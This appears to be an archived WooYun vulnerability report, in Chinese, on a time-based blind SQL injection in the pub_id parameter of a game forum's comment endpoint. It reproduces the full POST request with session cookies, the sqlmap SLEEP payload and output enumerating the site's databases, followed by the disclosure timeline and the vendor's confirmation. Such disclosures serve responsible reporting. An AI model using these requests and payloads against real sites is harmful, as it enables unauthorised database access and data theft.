乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-20: 细节已通知厂商并且等待厂商处理中 2015-04-20: 厂商已经确认,细节仅向厂商公开 2015-04-30: 细节向核心白帽子及相关领域专家公开 2015-05-10: 细节向普通白帽子公开 2015-05-20: 细节向实习白帽子公开 2015-06-04: 细节向公众公开
我就那么随便一测试···哥 那几个漏洞还确认不?···
POST内容 将post内容保存为1.txt
POST /bin/comment_create.php HTTP/1.1Host: bbs.shiwan.comProxy-Connection: keep-aliveContent-Length: 145Accept: */*Origin: http://bbs.shiwan.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 UBrowser/4.1.4627.19 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://bbs.shiwan.com/subject/177225Accept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=8kcf0e0st90qs2j3ojvib75tp1; Hm_lvt_b62f4400b835e82ee066d6d620606917=1429240474; Hm_lpvt_b62f4400b835e82ee066d6d620606917=1429240474; [email protected]; pgv_pvi=9918721024; pgv_si=s9459251200; current_uid=3179139; current_user_score=5; jiathis_rdc=%7B%22http%3A//bbs.shiwan.com/subject/52756%22%3A-970578339%2C%22http%3A//bbs.shiwan.com/subject/54264%22%3A-970571628%2C%22http%3A//bbs.shiwan.com/subject/186741%3F1429253894%22%3A-970234094%2C%22http%3A//bbs.shiwan.com/subject/186741%22%3A-970114428%2C%22http%3A//bbs.shiwan.com/subject/186782%22%3A-970079946%2C%22http%3A//bbs.shiwan.com/subject/115515%3F1429254745%22%3A-969704491%2C%22http%3A//bbs.shiwan.com/subject/115515%22%3A-968983514%2C%22http%3A//bbs.shiwan.com/subject/188910%22%3A-961967162%2C%22http%3A//bbs.shiwan.com/subject/75440%22%3A-961294766%2C%22http%3A//bbs.shiwan.com/subject/181846%22%3A-958908883%2C%22http%3A//bbs.shiwan.com/subject/142965%22%3A-958867674%2C%22http%3A//bbs.shiwan.com/subject/175227%22%3A-958824546%2C%22http%3A//bbs.shiwan.com/subject/186638%22%3A-958800740%2C%22http%3A//bbs.shiwan.com/subject/177545%22%3A0%7C1429265334319%2C%22http%3A//bbs.shiwan.com/subject/177225%22%3A%220%7C1429265412291%22%7D; Hm_lvt_9e00488eabf8fd23e9f79e6cffd51708=1429265188,1429265229,1429265329,1429265408; Hm_lpvt_9e00488eabf8fd23e9f79e6cffd51708=1429265450pub_id=42&comment=023&subject_id=177225&comment_cookie_name=3179139_comment&comment_current_time=1429265891&picture_insert_src=&video_insert_src
然后sqlmap 注入
sqlmap identified the following injection points with a total of 1461 HTTP(s) requests:---Place: POSTParameter: pub_id Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: pub_id=42 AND SLEEP(5)&comment=023&subject_id=177225&comment_cookie_name=3179139_comment&comment_current_time=1429265891&picture_insert_src=&video_insert_src=---[18:25:11] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL 5.0.11[18:25:11] [INFO] fetching database names[18:25:11] [INFO] fetching number of databases[18:25:11] [INFO] retrieved:
时间注入太慢了 点到为止吧 时间紧迫 懒得再去弄 反正有时间 跑数据库什么的 不是问题···
[18:25:53] [INFO] adjusting time delay to 2 seconds due to good response times9[18:25:54] [INFO] retrieved: information_schema[18:31:07] [INFO] retrieved: comment[18:33:16] [INFO] retrieved: ismp[18:34:39] [INFO] retrieved: mysql[18:36:08] [INFO] retrieved: notification[18:39:41] [INFO] retrieved: performance_schema[18:44:47] [INFO] retrieved: publish[18:47:00] [INFO] retrieved: qa[18:47:24] [INFO] retrieved: shiwan[18:49:11] [INFO] fetching tables for databases: 'comment, information_schema,smp, mysql, notification, performance_schema, publish, qa, shiwan'[18:49:11] [INFO] fetching number of tables for database 'comment'[18:49:11] [INFO] retrieved: 118[18:49:35] [INFO] retrieved: activity[18:51:49] [INFO] retrieved: comment_ext[18:55:21] [INFO] retrieved: comment_long_0[18:58:03] [INFO] retrieved: comment_long_1[18:59:10] [INFO] retrieved: comment_long_2[19:00:20] [INFO] retrieved:
危害等级:高
漏洞Rank:20
确认时间:2015-04-20 12:16
非常感谢您提供的漏洞,我们会尽快处理,谢谢!希望后续继续关注我们,提交漏洞。感谢。
暂无